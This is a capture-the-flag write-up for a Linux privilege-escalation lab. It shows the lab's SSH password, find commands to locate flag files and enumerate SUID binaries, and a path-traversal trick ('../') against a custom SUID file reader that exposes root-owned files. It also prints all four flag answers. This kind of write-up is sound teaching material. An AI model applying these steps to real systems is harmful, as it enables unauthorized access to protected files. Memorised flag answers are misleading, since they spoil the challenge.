Tags: linux privilege_escalation suid
Rating: 5.0
# Talking To The Dead 1-4
`ssh server = [email protected]`
`ssh password = hacktober-Underdog-Truth-Glimpse`
## Problem
We've obtained access to a server maintained by spookyboi. There are four flag files that we need you to read and submit (flag1.txt, flag2.txt, etc).
## Solution
we need to obtain 4 files.
flag1.txt flag2.txt flag3.txt and flag4.txt
lets get searching!
for this we can use the find command.
#find / -iname *flag* 2>/dev/null | grep .txt#

here we are searching for files that have `flag` in their name and grepping the ones that are .txt files.
and we got the flags location!
we can read the first 2 flags but the others give us permission denied.
#cat /home/luciafer/Documents/flag1.txt#
#cat /home/luciafer/Documents/.flag2.txt#
flag{cb07e9d6086d50ee11c0d968f1e5c4bf1c89418c} - flag 1
flag{728ec98bfaa302b2dfc2f716d3de7869f3eadcbf} - flag 2
lets priv esc!
runing `sudo -l` gives us `bash: sudo: command not found`
I will not try to upload linpeas here.
lets search for suid.
#find / -perm -u=s -type f 2>/dev/null#

we find /usr/local/bin/ouija
which looks weird.
lets try to run it.
looks like its for file reading in the root directory.

lets try to read flag4 on the root directory.
we can see the that file puts `/root/` at the start for us.
so we just need to enter the file name in the root directory.

#/usr/local/bin/ouija flag4.txt#

and we have flag4!
flag{4781cbffd13df6622565d45e790b4aac2a4054dc} - flag 4
now to read flag3 on spookyboi Documents directory.
#/usr/local/bin/ouija ../home/spookyboi/Documents/flag3.txt#
we need to escape the default `/root/` directory so we add `../` at the start

and we have flag 3!
flag{445b987b5b80e445c3147314dbfa71acd79c2b67} - flag 3